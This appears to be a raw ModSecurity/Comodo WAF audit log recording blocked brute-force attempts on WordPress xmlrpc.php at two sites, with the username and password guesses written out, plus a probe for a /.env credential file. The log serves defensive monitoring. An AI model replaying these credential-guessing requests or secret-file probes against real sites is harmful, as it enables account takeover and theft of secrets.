Stopwatch2: 1749116356271662 4402; combined=3340, p1=359, p2=2811, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e8d6335-Z-- --2a696465-A-- [05/Jun/2025:16:39:46 +0700] aEFl4irHpfaS2Cuwh8UDXAAAAFY 103.236.140.4 42126 103.236.140.4 8181 --2a696465-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2a696465-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin83 --2a696465-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a696465-E-- --2a696465-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116386884262 4565 (- - -) Stopwatch2: 1749116386884262 4565; combined=3598, p1=355, p2=3084, p3=0, p4=0, p5=93, sr=77, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a696465-Z-- --5d6ae979-A-- [05/Jun/2025:16:40:21 +0700] aEFmBSrHpfaS2Cuwh8UDbQAAAEE 103.236.140.4 42206 103.236.140.4 8181 --5d6ae979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d6ae979-C-- wp.getUsersBlogs wakasarpras wakasarpras1994 --5d6ae979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6ae979-E-- --5d6ae979-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116421414462 5330 (- - -) Stopwatch2: 1749116421414462 5330; combined=3768, p1=461, p2=3135, p3=0, p4=0, p5=101, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6ae979-Z-- --d3a7176d-A-- [05/Jun/2025:16:40:28 +0700] aEFmDOth7G2xELALzPZS-wAAAMg 103.236.140.4 42218 103.236.140.4 8181 --d3a7176d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3a7176d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@456 --d3a7176d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3a7176d-E-- --d3a7176d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116428055992 4591 (- - -) Stopwatch2: 1749116428055992 4591; combined=3608, p1=402, p2=3018, p3=0, p4=0, p5=108, sr=97, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3a7176d-Z-- --8fc7b96e-A-- [05/Jun/2025:16:41:21 +0700] aEFmQX-K7ToMdu-YSIJQ-wAAAAo 103.236.140.4 42406 103.236.140.4 8181 --8fc7b96e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8fc7b96e-C-- wp.getUsersBlogs wakasarpras Admin123456 --8fc7b96e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fc7b96e-E-- --8fc7b96e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116481250791 5159 (- - -) Stopwatch2: 1749116481250791 5159; combined=3680, p1=467, p2=3036, p3=0, p4=0, p5=104, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fc7b96e-Z-- --a4b84438-A-- [05/Jun/2025:16:42:21 +0700] aEFmfVwdJdhOudw5hdz4bwAAAJE 103.236.140.4 42576 103.236.140.4 8181 --a4b84438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a4b84438-C-- wp.getUsersBlogs wakasarpras marketing2022 --a4b84438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4b84438-E-- --a4b84438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116541237793 32091 (- - -) Stopwatch2: 1749116541237793 32091; combined=58364, p1=349, p2=2916, p3=0, p4=0, p5=27563, sr=80, sw=80, l=0, gc=27456 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4b84438-Z-- --9c7e317f-A-- [05/Jun/2025:16:42:30 +0700] aEFmhirHpfaS2Cuwh8UDtwAAAEg 103.236.140.4 42616 103.236.140.4 8181 --9c7e317f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9c7e317f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix++ --9c7e317f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c7e317f-E-- --9c7e317f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116550820174 4394 (- - -) Stopwatch2: 1749116550820174 4394; combined=3434, p1=394, p2=2853, p3=0, p4=0, p5=107, sr=80, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c7e317f-Z-- --ea30e344-A-- [05/Jun/2025:16:42:43 +0700] aEFmkyrHpfaS2Cuwh8UDuwAAAEs 103.236.140.4 42628 103.236.140.4 8181 --ea30e344-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ea30e344-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@100 --ea30e344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea30e344-E-- --ea30e344-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116563944451 4383 (- - -) Stopwatch2: 1749116563944451 4383; combined=3436, p1=363, p2=2906, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea30e344-Z-- --2a42323b-A-- [05/Jun/2025:16:43:21 +0700] aEFmuSrHpfaS2Cuwh8UD4QAAAEY 103.236.140.4 42712 103.236.140.4 8181 --2a42323b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2a42323b-C-- wp.getUsersBlogs wakasarpras PASS123 --2a42323b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a42323b-E-- --2a42323b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116601043689 4288 (- - -) Stopwatch2: 1749116601043689 4288; combined=3307, p1=349, p2=2790, p3=0, p4=0, p5=98, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a42323b-Z-- --72332112-A-- [05/Jun/2025:16:44:26 +0700] aEFm-irHpfaS2Cuwh8UEGwAAAE0 103.236.140.4 42942 103.236.140.4 8181 --72332112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --72332112-C-- wp.getUsersBlogs wakasarpras p@ssword --72332112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72332112-E-- --72332112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116666218016 4365 (- - -) Stopwatch2: 1749116666218016 4365; combined=3348, p1=385, p2=2795, p3=0, p4=0, p5=98, sr=107, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72332112-Z-- --f8da1a6f-A-- [05/Jun/2025:16:45:26 +0700] aEFnNirHpfaS2Cuwh8UEQQAAAEY 103.236.140.4 43056 103.236.140.4 8181 --f8da1a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f8da1a6f-C-- wp.getUsersBlogs wakasarpras market --f8da1a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8da1a6f-E-- --f8da1a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116726302848 4326 (- - -) Stopwatch2: 1749116726302848 4326; combined=3317, p1=355, p2=2791, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8da1a6f-Z-- --406ddc63-A-- [05/Jun/2025:16:46:26 +0700] aEFncirHpfaS2Cuwh8UEXwAAAFY 103.236.140.4 43176 103.236.140.4 8181 --406ddc63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --406ddc63-C-- wp.getUsersBlogs wakasarpras 456321 --406ddc63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --406ddc63-E-- --406ddc63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116786118951 4291 (- - -) Stopwatch2: 1749116786118951 4291; combined=3365, p1=363, p2=2838, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --406ddc63-Z-- --c9eb2715-A-- [05/Jun/2025:16:47:26 +0700] aEFnrirHpfaS2Cuwh8UEpgAAAEg 103.236.140.4 43326 103.236.140.4 8181 --c9eb2715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c9eb2715-C-- wp.getUsersBlogs wakasarpras iloveyou --c9eb2715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9eb2715-E-- --c9eb2715-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116846357076 4275 (- - -) Stopwatch2: 1749116846357076 4275; combined=3294, p1=368, p2=2757, p3=0, p4=0, p5=99, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9eb2715-Z-- --d68b473f-A-- [05/Jun/2025:16:48:09 +0700] aEFn2SrHpfaS2Cuwh8UEuAAAAEA 103.236.140.4 43376 103.236.140.4 8181 --d68b473f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d68b473f-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d68b473f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68b473f-E-- --d68b473f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116889159665 4360 (- - -) Stopwatch2: 1749116889159665 4360; combined=3319, p1=355, p2=2796, p3=0, p4=0, p5=99, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68b473f-Z-- --6dd3c17e-A-- [05/Jun/2025:16:48:16 +0700] aEFn4H-K7ToMdu-YSIJRWwAAABc 103.236.140.4 43412 103.236.140.4 8181 --6dd3c17e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6dd3c17e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1967 --6dd3c17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dd3c17e-E-- --6dd3c17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116896484433 4722 (- - -) Stopwatch2: 1749116896484433 4722; combined=3568, p1=362, p2=3017, p3=0, p4=0, p5=112, sr=78, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dd3c17e-Z-- --1ee99d2f-A-- [05/Jun/2025:16:48:20 +0700] aEFn5H-K7ToMdu-YSIJRZAAAAAs 103.236.140.4 43432 103.236.140.4 8181 --1ee99d2f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre Accept-Charset: utf-8 --1ee99d2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ee99d2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749116900069444 695 (- - -) Stopwatch2: 1749116900069444 695; combined=279, p1=243, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ee99d2f-Z-- --a07f4f57-A-- [05/Jun/2025:16:48:26 +0700] aEFn6n-K7ToMdu-YSIJRbAAAABI 103.236.140.4 43456 103.236.140.4 8181 --a07f4f57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a07f4f57-C-- wp.getUsersBlogs wakasarpras !@#123 --a07f4f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07f4f57-E-- --a07f4f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 